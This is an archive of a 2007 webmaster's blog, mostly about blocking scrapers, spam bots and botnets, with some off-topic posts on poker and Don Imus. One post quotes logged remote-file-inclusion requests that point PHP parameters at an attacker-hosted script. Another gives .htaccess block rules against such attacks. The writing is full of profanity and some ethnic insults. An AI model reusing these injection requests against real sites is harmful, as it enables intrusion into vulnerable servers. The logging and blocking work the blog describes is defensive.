Thursday, June 21, 2007

Javascript Cloaked Spam Pages Baffle Search Engines

Recently I ran across a large series of scraper sites that are the ultimate in openly cloaking to the search engines. The pages I see when I view the source are the same pages cached by the search engines, nothing special there so a search engine crawling outside it's IP range to check for cloaking would see the same page.

However, access those pages with javascript enabled and you are instantly redirected to a wide variety of affiliate pages. The trick is these pages all have a single embedded link to a heavily obfuscated page of javascript that redirects you to the affiliate pages.

The scraping to build these cloaked pages came from 216.75.15.26 which is in the cari.net IP range:

OrgName: California Regional Intranet, Inc.
NetRange: 216.75.0.0 - 216.75.63.255
Just goes to show you that traditional cloaking is a thing of the past as the war has escalated into obfuscated javascript. The only way I see the search engines winning this war is to actually execute that javascript and see if the resulting action was to take the visitor away from the page.

Just goes to show that people claiming here in comments recently that "Stealth crawling is necessary to keep honest webmasters honest" are out of their league and don't really know what the score is on the web as the sites aren't honest when they are in plain site, no stealth needed, they worked around it.

Wonder what they'll think up next?

Saturday, June 16, 2007

Blog Feed Messed Up

I just noticed that the blogger feed is all messed up and my reorganizing old posts into categories and such appears to also dump them into the feed as something new.

Stupid blogger.

Sorry for the problem, but there doesn't appear to be much I can do about this.

Be prepared for a bumpy ride of summer reruns as I organize the blog!

Contact Us Form Spammers

Well boys and girls, you didn't really think that hiding your email address behind a CONTACT US form would stop spammers did you?

I have all of my forms on my website protected except one page which I left wide open with no protection just to allow anyone having trouble with the site easily contact me. That page has just a simple form, no captcha, no referrer checks, no bot blocking, nothing, it's completely open as a safety valve for access from end users.

However, some dick head in Oman with nothing better to do has apparently decided to make it his personal goal in life to automatically post to this form.

You have to ask yourself, why is this random form page so important?

The answer is obvious as everyone hides behind CONTACT US forms and no longer post email addresses which the spammers can no longer harvest from your web page. Now it would appear they are harvesting any page with a FORM on it and trying to set up the parameters that allow them to submit spam through all these forms.

I don't run any off-the-shelf Open Source software so there is no software fingerprint on any of my pages that the mass spammers could easily find, so this is an act of desperation in manually building a bigger database of sites to spam.

Just to prove this theory, I checked to see what else this spammer was trying to do on my site besides trying to spam my contact page. Big shock, the same IP address is trying to spam the other protected pages.

Here's some other info collected from the same IP:

62.231.243.137 "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040115 Galeon/1.3.12" "massive dick sex" http://bratuha.info

62.231.243.137 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "Online tramadol. Cheap tramadol." http://
I never see any of the above junk in my Inbox or anywhere else as it's all submitted on protected pages so a little information is automatically logged and the rest of the crap discarded.

So how can I protect this form from automation and still leave it open to not impact other visitors?

We'll use one of my old favorites, a simplistic but effective approach, which is RANDOM FIELD NAMES. Each time the form is displayed the field names change so the spammer can't pre-program any code to automatically populate the fields because he won't know their name.

An argument could be made that the spammer could read the page and use the field position, but that would assume the position in the HTML is the same as the position on the page, good old CSS to the rescue.

If I want to really make it just about impossible for the spammer to figure out the page and still not use javascript or a captcha, I might use 10-20 random fields with only 3 of them chosen at random to be visible so the user would never know the difference.

Golly gee Mr. Spammer, which of those 20 random fields should you fill in?

Be careful because filling the wrong field, the field the visitor can't see, is yet another form of CAPTCHA, so choose your field wisely otherwise you're automatically going to be banned.

Maybe to be real sneaky, I'll just add new fields to the form and leave the old obsolete fields on the page so if they get filled in I know it's an old spammer script.

Just remember, keeping your email address off the web site doesn't mean you won't get spammed so secure those contact pages today!

Friday, June 15, 2007

Doctor Zero Goes Scraping

Some scraper used all zeros in place of the parameters normally found in an MSIE or Firefox browser user agent.

Just look at this stupid crap:

86.21.47.45 "Mozilla/5.0 (000000000; 0; 000 000 00 0 000000; 00000; 0000000000) 00000000000000 000000000000000"

86.21.47.45 "Mozilla/5.0 (000000000; 0; 000 000 00 0; 00) 000000000000000 0000000 0000 000000 000000000000"
You know what he got for his efforts?

A big fat fucking ZERO in return, nada, zip, zilch, goose egg.

I'll bet he got the same number as a grade on his computer science project in school too!

Sunday, June 10, 2007

Jesus Can't Help You Surf

Jesus may be his savior, but my bot blocker is mine.

68.46.236.235 [c-68-46-236-235.hsd1.fl.comcast.net.]
requested 1 pages as "Jesus Is My Savior"
Sorry pal, but to get access to my site you'll need something called Mozilla.

AMEN

Tuesday, June 05, 2007

TextDigger Caught Using Stealth Shovel

Some semantic search thing called TextDigger stumbled into my spider trap today.

I have nothing against semantic search, I'm not an anti-semantite (that's not the word you think it is, read it twice, i made it up just to be punny), but I'm definitely anti-stealth crawler.

According to the bot blocker, TextDigger requested 136 pages after being challenged while using the following user agent:

64.124.138.164 [nat1.textdigger.com]
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Here's their IP range:
TextDigger MFN-B849-64-124-138-160-28 (NET-64-124-138-160-1)
64.124.138.160 - 64.124.138.175
Not sure if what hit my server was their actual main crawler or not, but they aren't gaining any brownie points with me crawling in stealth for any reason.

Thursday, May 31, 2007

BotNets Hosting Files On Lycos UK

Found this amusing little botnet attack for random vulnerabilities today that was pointing to Lycos.co.uk as the host of their little file.

85.25.148.223 - "GET //article.php?id=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.803"

85.25.148.223 - "GET //rpm-pl/php-manual-ru.html?hl=http://members.lycos.co.uk/modelteam/echo.txt? " "libwww-perl/5.803"

193.144.43.198 - "GET //index.php?newlang=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.65"

193.144.43.198 - "GET //rpm-pl/php-manual-ru.html?hl=http://members.lycos.co.uk/modelteam/echo.txt?"
"libwww-perl/5.65"

193.144.43.198 - "GET //article.php?id=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.65"

66.194.211.86 - "GET //article.php?id=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.79"

66.194.211.86 - "GET //index.php?newlang=http://members.lycos.co.uk/modelteam/echo.txt?" "libwww-perl/5.79"

Quite amusing that the botnets are now leveraging large companies member services to do their evil bidding.

Tuesday, May 29, 2007

Bot Blocker Tracking More Than 80K Unique IPs

Lately I've been doing some analysis work on my database of IPs that I'm tracking for bad behavior and it exceeded 80K unique IPs. Many of these are from data centers, bot nets, home-based scrapers and then some, but it's a staggering number when it exceeds 80K.

People always wonder why I'm such an anti-scrape nazi but it's really not hard to see the problem when you multiply 80K IPs trying to scrape an excess of 40K pages, which is a potential for having over 3 BILLION pages scraped in the last year.

Here's the number with all the zeroes: 3,200,000,000 pages.

OK, that's really a lot of pages and there's no way I'm paying for that kind of bandwidth.

I seriously doubt they would ever hit the maximum pages but there's no way I'm unlocking the doors and let them run rampant just to find out how bad it would really get.

Here's a sample of 3 greedy fuckers that paid a visit just today:

82.34.200.237 [82-34-200-237.cable.ubr05.hari.blueyonder.co.uk.] requested 710 pages as "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1020.2544-big; Windows XP 5.1; MSIE 6.0.2900.2180)"

70.80.186.223 [modemcable223.186-80-70.mc.videotron.ca.] requested 1071 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

201.58.219.234 [20158219234.user.veloxzone.com.br.] requested 329 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"

They only got a couple of pages before getting nothing but garbage, but they just keep trying. Based on the location of the IPs, I'm thinking it might be compromised machines in a botnet trying to scrape from stealth locations, hard to say.

The best part is, they're now charter members of my AUTO-QUARANTINE list of IPs meaning they're blocked from accessing any pages on their next trip unless a human is at the controls, and even then, they could get locked out real fast if they aren't careful!

Monday, May 21, 2007

Top 10 Signs Your Website Has Made it Big

People ask me every now and then how to tell when their website has finally hit the big time.

In response, I compiled a Top Ten list of things that come to mind based on my own experience.

Top Ten Signs Your Site Has Made it Big

  1. Your site traffic is higher than you could ever imagine and you pinch yourself daily to make sure you're not dreaming.

  2. Email fills your Inbox non-stop all day long with no prayer of it all ever being answered.

  3. Other webmasters constantly pester you to swap links with their site and you already have so many quality back links you can say "No Thanks!" without even checking their site.

  4. People from around the country (world) start calling your phone number that don't comprehend the terms "9-5 PST".

  5. You don't go searching new business opportunities, they seek you out.

  6. People ask your advice for all sorts of business related topics that previously wouldn't have asked you for the time of day.

  7. Media marketing companies call you to get their ad network on your site and you can easily decline all those offers because they simply don't pay enough for your space.

  8. Everyone wants their products to be displayed on your site and you can actually negotiate a better payout than the rest of their affiliates.

  9. Hiring employees or contractors to run your website and help with your business issues is suddenly a possibility.

  10. And the top sign your site has made it big:
    You start cashing really big fat checks on a regular basis.

Saturday, May 19, 2007

Hosting Company Blocks Bots

Looks like we overlooked this little press release last year when Mecca Hosting announced Mecca Hosting Bounces Bad Bots from their servers.

Here's the good stuff:

Mecca Hosting, a leader in providing customized hosting solutions, has just released a new system to detect and block suspicious automated programs or "bots". Mecca Hosting's new system, by blocking these bad bots, helps protect customer's intellectual property, e-mail addresses, and prevents blog spamming and hacker attacks. This new system can detect good bots, like Search Engines and specialized tools, to allow them access to websites, while blocking the bad ones. This new technology will result in vastly increased website uptime and performance, due to the expected reduction in hack attempts; mainly because hackers use automated tools to find system vulnerabilities.
Sounds good, but how good is it?

Just to see if it basically worked, I used a few tools to try to snag a page or two and got bitch slapped with 403 errors.

Not bad Mecca, not bad.

If we could just get all hosts to do this, and even dedicated server companies to offer this kind of technology, maybe the scrapers would already be out of business.

Tuesday, May 08, 2007

Block LIBWWW-PERL and web addresses to protect your site from botnets

Not only do I block all accesses from libwww-perl, I also log what they were looking for which turns up an amazing amount of botnet hits on a daily basis just randomly hitting websites trying to find a way inside.

The first trick to securing your site from the script kiddies is to block any user agent that contains "libwww-perl" which will stop the dumb ones from owning your site.

Try adding this to your .htaccess file:

RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
The next trick is to filter out things in your QUERY_STRING such as "=http:" which is a typical in the botnet scripts that attempt to upload files to vulnerable software. This won't impact most other applications because file uploads tend to be done via a form and a POST, not a GET command.

With these 2 minor security changes you've eliminated many vulnerabilities from botnet attackers and blocked their method of uploading files.

It's not 100% but it may be enough to help you survive the next time your Open Source application gets a vulnerability until you can actually apply the patch.

Greedy French Scraping Bastard

This swine from the land of overpriced wine asked for robots.txt then tried to rip over 1300 pages.

83.198.150.2 "GET /robots.txt HTTP/1.0" 200 146 "-" "-"

83.198.150.2 [ALille-252-1-48-2.w83-198.abo.wanadoo.fr.] requested 1321 pages as "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0)"
Too bad Pepe Le Pew, your feeble scraping attempts SUCK and you got 1300+ pages of error messages so Phuck Off.

[sing a long with apologies to Cheryl Crow...]

All I wanadoo is scrape some pages,
We'll download it, and not take ages.

All I wanadoo is grab your site,
And then cloak it all to Google tonight!

Sorry Pharma Spammer Strikes Again

Some miserable asshole is using "Sorry for subject" as a spam topic and attempting to spam from all over the world. Mainly it's one IP in Germany with some others from other locations.

Most of the links they're spamming are for pharma related sites but there was an actual domain park page thrown in as well which really made me giggle.

The most fun is my spam blocker that I wrote never lets any of this shit through to my website, but just silently logs it so I can go back and see what these shit-for-brains are doing later just for my own amusement, plus collecting the IPs to block.

Here's the German sorry spammer:

62.141.53.139 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "Sorry for subject" http://tramadol.4hfs.org
62.141.53.139 "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5) Gecko/20041220 K-Meleon/0.9" "Sorry for subject" http://phentermine.4hfs.net
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051102 Firefox/1.6a1" "Sorry for subject" http://tramadol.hfslink.com
62.141.53.139 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "Sorry for subject" http://tramadol.4hfs.net
62.141.53.139 "Mozilla/4.0 (compatible; ICS 1.2.105)" "Sorry for subject" http://phentermine.2hl.org
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20041122 Firefox/0.5.6+" "Sorry for subject" http://phentermine.3mac.info
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)" "Sorry for subject" http://tramadol.4hfs.org
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8a) Gecko/20040416 Firefox/0.8.0+" "Sorry for subject" http://phentermine.viphls.org
62.141.53.139 "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "Sorry for subject" http://phentermine.3mac.info
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.10) Gecko/20050716 Thunderbird/1.0.6" "Sorry for subject" http://tramadol.medhls.com
62.141.53.139 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051019 Flock/0.4 Firefox/1.0+" "Sorry for subject" http://phentermine.3mac.info
62.141.53.139 "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15" "Sorry for subject" http://tramadol.medhls.com
62.141.53.139 "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126" "Sorry for subject" http://phentermine.viphls.org


Here's the rest of the sorry spammers:
59.93.35.80 "Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "Sorry for subject" http://phentermine.10pharm.com
60.217.227.141 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10.1" "Sorry for subject" http://phentermine.viphls.org
68.10.68.144 "Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686) Opera 7.20 [en]" "Sorry for subject" http://tramadol.madnewus.com
69.249.59.232 "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.6) Gecko/20040206 Firefox/0.8" "Sorry for subject" http://cialis.mednewus.com
86.139.64.133 "Mozilla/4.0 (compatible; MSIE 6.0; Mac_PowerPC Mac OS X; en) Opera 8.0" "Sorry for subject" http://tramadol.hfslink.com
89.208.4.195 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "Sorry for subject" http://ativan.10pharm.com
200.49.102.100 "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8" "Sorry for subject" http://tramadol.4mednew.com
200.55.113.119 "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "Sorry for subject" http://tramadol.2hl.org
201.17.208.188 "Opera/8.01 (Windows NT 5.1)" "Sorry for subject" http://tramadol.4hfs.net
201.45.41.153 "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" "Sorry for subject" http:///tamiflu.hlspharm.info
210.87.251.41 "Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040707 Firefox/0.9.2" "Sorry for subject" http://zetia.hlspharm.info
218.38.9.218 "Mozilla/4.76 [en] (Windows NT 5.0; U)" "Sorry for subject" http://phentermine.cvipm.com
220.78.229.119 "Mozilla/5.0 (Windows; U; WinNT4.0; en-CA; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1" "Sorry for subject" http://tramadol.10pharm.com

You're such a sorry fucking spammer you don't even know you're just wasting your time you stupid fuckhead.

Monday, April 30, 2007

Why Do Poker Players Overstay Their Welcome?

I've been playing poker most of my life and no-limit Texas Hold'em for almost 20 years now and it never ceases to amaze me that people who are winning money, the table chip leaders, will continue to sit at that table until they bust.

What they hell is wrong with you poker players out there?

Hint: If you get a big pile of chips, GO HOME!

These people are obviously addicted to the rush of going "all-in" and sure they can double up their stack yet again and consistently lose it all.

The games I tend to play are either a 1-1-2 spread limit or a 2/4 no-limit, both with a minimum $4 bet and you can buy-in with a $100 minimum. Now the object of this game, at least my object, is to sit tight and wait for good cards while watching the play, maybe up to an hour without really getting involved with the action.

Do the math as my strategy really isn't that hard.

You pay for nothing but the blinds, unless you get killer hole cards, then you make your move.

The blinds in this game are typically $6 per each time 9 hands are dealt around the table, so you get to see 9 sets of hole cards for only $6. Better yet, you get to study how your opponents play 9 times (assuming 9 players per table) for $6 even if you take no action. This means for a measly $100 you can evaluate up to 9 hands per blind for 16 blinds, or a whopping 198 hands of cards.

The next thing is you NEVER buy-in for more than the minimum, which is $100 at this game, even if you could buy-in for $200 or more. Why you do this is you're protected in an all-in bet limited by your current table stakes. This gives you a lower risk all-in opportunity to double up your money for each $100 you buy-in. If you lose an all-in bet you've never lost more than $100 so you still hopefully have another $100 in your pocket to get more chips and try again.

Now the real secret, IMO, is to never spend more than $300 per day playing this game otherwise you quickly get upside down losing so much you have to keep chasing pots to get back even, let alone winning. If the cards are that bad and you've already lost $300, which would be about 3 hours playing for me, it's time to go home and try again another day.

Do I sound like a cheap gambler to you?

Hell no, just a smart one.

Been there, done the big stakes, the game is still the same small or low stakes.

The idea is always to play on THEIR money and not use YOUR money if possible. My investment in the game is just the bankroll to get the first big win and then I gamble using my winnings to get to the next bigger win. I could easily be into a game for a thousand dollars but that would be stupid as the object is to build off a smaller bankroll and then play on other peoples money. If you see me sitting with a thousand dollars in front of me you can bet your ass I have typically no more than $200 invested in the game. If I start to lose and see my stacks of chips declining, I always try to get out at a minimum with at least what I started with, and some winnings as well, not go completely bust like I see so many others do consistently.

Now that you have an idea of how I play, a little backgrounder on me, let's get back to the topic of people that overstay their welcome...

I took a break from no-limit poker for a couple of years, not because I didn't want to play, but because I couldn't find any good games locally. Then a few months ago I came across the exact same version of the No-Limit Texas Hold'em game I always used to play and it was a blast. So far recently I've played it 6 times and won 5 times, cleaned up all but one night when the cards just plain stunk.

On a couple of these games, I walked up to the table and there was a definitive chip leader with $800-$1000 piled up in front of them. One of them was a really solid tight player and the other was a loose player chasing pots that just happened to get lucky. The tight player sadly got a bad run and started losing to me with such hands as my King-high flush all-in against their Queen-high flush, and so on and so forth, one bad beat after another until I broke him on a final all-in bet. The loose player was a different night, ah well, he would bet large amounts on an Ace-high nothing into my 2 pair, and similar bad bets, and literally thought he could bully me out of the pot with bigger bets but I called and broke his ass as well.

When I took their big pile of chips guess what I did?

I WENT HOME!

Remember what I said, they overstayed their welcome and gave it all back. I didn't overstay my welcome, I cashed out and went home, adding their money to my gambling war chest.

Until next week...

Wednesday, April 25, 2007

Myths About CAPTCHA's

For those that don't know what a CAPTCHA is, it's something that typically a human can answer but automated software can't figure out. An example of this is on the comments page of this blog which has a box with the squiggly letters you have to type in before you can submit a comment.

Some people are declaring that it's the end of the CAPTCHA era either with human powered sites that trick visitors into providing the answer to the CAPTCHA, or automated image recognition software that just needs time and a little computing horsepower to decode the text in the image.

Myth #1 - CAPTCHA's aren't accessible to the visually impaired.

Accessibility issues are a legitimate complaint for some sites that don't implement a robust accessible CAPTCHA solution. For instance, the visually impaired can use the alternative audio CAPTCHA used on this very blog that solves this simple problem. Other types of CAPTCHAs that are math or word problems which are easier to read are also accessible.

Myth #2 - All CAPTCHA's are those squiggly text things seen on blogs.

Most of the comments about CAPTCHA's are based on the one type of CAPTCHA that uses extremely bent and distorted text called Gimpy. However, Gimpy is just scratching the surface when it comes to CAPTCHAs as they come in many forms.

Some of the other CAPTCHAs variants include identifying what's contained in a picture, simple math questions like "1 + 4 = ?", a text question like "What color is the sky?", or typing in the letters or numbers played via audio.

If you don't think people can spell "BLUE" or answer the math question properly you can always give them a nice drop list of possible answers and only give one chance to answer per question to stop bots from hacking at the answer.

Myth #3 - Bots can easily "BLOW THROUGH" CAPTCHAs.

When humans are being used to provide CAPTCHA answers that can be the case, but only when you implement sloppy CAPTCHA code in the first place. You can use a series of security measures to make sure there's a human sitting at the keyboard and it's not being passed through by a bot.

  1. Require Javascript to validate the CAPTCHA since the majority of bots don't run Javascript in the first place.
  2. Obfuscate your CAPTCHA in randomized encoded Javascript so that it's difficult, if not impossible, for a bot to even detect the presence of a CAPTCHA on the page in the first place.
  3. Use Javascript input sensory techniques such as MT Keystrokes to detect whether a human has actually typed into the field on the web page.
  4. Randomize the type of CAPTCHA being used so that there isn't a single specific type of CAPTCHA to target with an automated tool.
Summary

The real vulnerability of most forums, blogs and wikis face isn't even the risk of CAPTCHA failure, it's the identical footprint of all the Open Source software which makes locating the comments pages so easy.

Changing the name of the anchor text and page name on a blog from "comments" and "comments.php" to "Post an Opinion" and "youropinion.php" is another form of CAPTCHA because the human will immediately know where to click but the bot might get confused.

Better yet, since most bots don't read javascript, simply obfuscate the actual HTML of your "Leave a Comment" section in Javascript. When bots can't even find the link to "leave a comment" or the form fields where you enter a comment in HTML it may eliminate the need for the more complex text bending CAPTCHA's in the first place. Sure, the spammers could code the bot to decode a single instance of obfuscated Javascript for a single blog, but the code itself could be randomly obfuscated so that it would be quite a difficult task.

Don't let the naysayers dissuade you from increasing the strength of your spam blocking as stronger CAPTCHA's combined with Javascript tricks appear to be bulletproof until the bots get a lot more complex and smarter.

P.S. Note that the guy claiming CAPTCHA's are dead doesn't have one on his blog and if you scroll down past the actual comments you'll see he has a shitload of porn spam at the bottom. Obviously someone knee deep in spam is NOT the person you should be listening to about whether or not to use a CAPTCHA.

Saturday, April 21, 2007

Gigablast Data Trail

While following where my data goes on the internet I found a couple of sites that appear to be using data from Gigablast which include eWoss and searchEstate.

The upside is fewer crawlers as they're leveraging existing data crawls in multiple locations.

The downside is that you have no control where your information shows up so the only way to control that relationship is block the source.

Update: Also found Gigablast content in Webled as well.

Thursday, April 19, 2007

Ezilon Also Has Some LookSmart Content

This time my content tracking bugs led me to Ezilon which has content that originated from LookSmart. Don't know if Ezilon is a LookSmart partner or what the deal is, perhaps they scraped LookSmart, but the link to one of my sites in their listings was definitely crawled by LookSmart.

Just goes to show that blocking bad bots from your site doesn't always stop your content from being misappropriated anyway.

Update: Also found LookSmart data in xogger.com.


Sunday, April 15, 2007

5 Reasons Why I Blog - Tagged By a Boy Named Sue

Looks like old anti-spam Connie tagged me because I'm a second-rate blogger that's about as popular as a fart in an elevator, but I'll accept that tag and play the game.

So here goes with my 5 reasons why I blog:

1. Because I'd probably get kicked off most, if not all forums, for saying some of the shit I say. Therefore, the best way to truly express my opinions and not get a boot to the head was to take it elsewhere, and the blog was born.

2. If I didn't blow off some steam every now and then when things are really pissing me off, my fucking head would explode, therefore blogging is also done for medicinal purposes.

3. My wife is probably sick and tired of hearing me rant and rave about things that get under my skin so I blog them out, then she can read it once, or I might read it to her, and it's over with. The blog may actually be saving my marriage until I blog about her one too many times, or about the wrong topic, and then the shit will hit the fan for sure.

4. I actually have some useful information to pass on from time to time and the blog is as good as any place to post it.

5. Blogging about exposing, blocking and whacking scrapers and spammers pisses them off so the blog gives us a nice virtual parking lot to duke it out.

There, I've done the deed, 5 fandamntastic reasons why I blog.

Looks like I should tag 5 other people just because misery loves company:

John Andrews - because I know John dislikes following the herd
MartiniBuster - just so I can imagine him rolling his eyes at me
SpamHuntress - so she'll get off MySpace and start blogging again
John Scott - he's been so intermittently blogging someone needs to kickstart his ass
WillMac - bots make him as crazy as they do me, so he needs to share

That's all for this time and may whoever comes up with the next game of blog tag get a big swift kick in the nuts from all of us that feel dragged into this shit whether we want to play or not.

Friday, April 13, 2007

Don Imus Joins Ranks of Unemployed

I've always hated Imus and just the sound of his voice and his idiotic bullshit made me want to smash radios.

Then those idiots over at MSNBC decided to put that stupid fucker on TV so the country could see that walking corpse spew bullshit in living color. That was the last day I ever watched MSNBC simply because it wasn't worth the risk of accidentally seeing that past-the-expiration-date walking organ donor still polluting the tube.

Now, thank the gods, he has aimed his prejudiced venom at the wrong bunch of women and not only has MSNBC gained a potential viewer when they canceled his dawn-of-the-dead carcass but CBS then followed suit and booted his old dusty ass to the curb.

Bye bye Imus, I won't miss you one fucking bit.

TIP FOR IMUS: Don't call the lady processing your unemployment claim a "nappy-headed ho" or she'll slap your ass into next week.

Sunday, April 08, 2007

Webaroo's Content Stealing PulseBot Flatlined

If you've never seen Webaroo before, the concept of copyright obviously has been completely glossed over.

Here's what it says on their website:

Webaroo servers crawl the web, analyze web pages and automatically select the subset of pages with the greatest diversity and quality in the least storage size. These pages are then packaged into topic-specific "Web Packs" that can be downloaded by users onto their devices. Once downloaded, users can search and browse that content on the go.
Here's an English to English translation:
Webaroo takes whatever copyrighted content of yours we want and repackage it for our customers without permission. Of course we do it without permission because nobody knows about Webaroo in the first place so they won't stop us or the many bot names. Isn't it cool how we're going to steal your shit and pack it up so others can download it and now they don't even need to bother visiting your website? Wicked!
Look at the total number of bot names coming from their crawler's IP address.
64.124.122.228 "WebarooBot (Webaroo Bot; http://64.124.122.252/feedback.html)"

64.124.122.228 "PiyushBot (Piyush Web Miner; http://piyush.com/feedback.html)"

64.124.122.228 "RufusBot (Rufus Web Miner; http://www.webaroo.com/rooSiteOwners.html)"

64.124.122.228 "RufusBot (Rufus Web Miner; http://64.124.122.252/feedback.html)"

64.124.122.228 "SumeetBot (Sumeet Bot; http://64.124.122.252/feedback.html)"

64.124.122.228 "PsBot (PsBot; http://64.124.122.252/feedback.html)"

64.124.122.228 "pulseBot (pulse Web Miner)"
Hell, if you were trying to stop them using robots.txt it's a lost cause as the bot names seem to get changed faster than a baby's diaper.

I would just block their range of IP's, it's more convenient.
Webaroo MFN-B843-64-124-122-224-27 (NET-64-124-122-224-1)
64.124.122.224 - 64.124.122.255
That's how you stop name changing bots, the firewall way.

Package THAT into a topic-specific "Web Pack" and download it.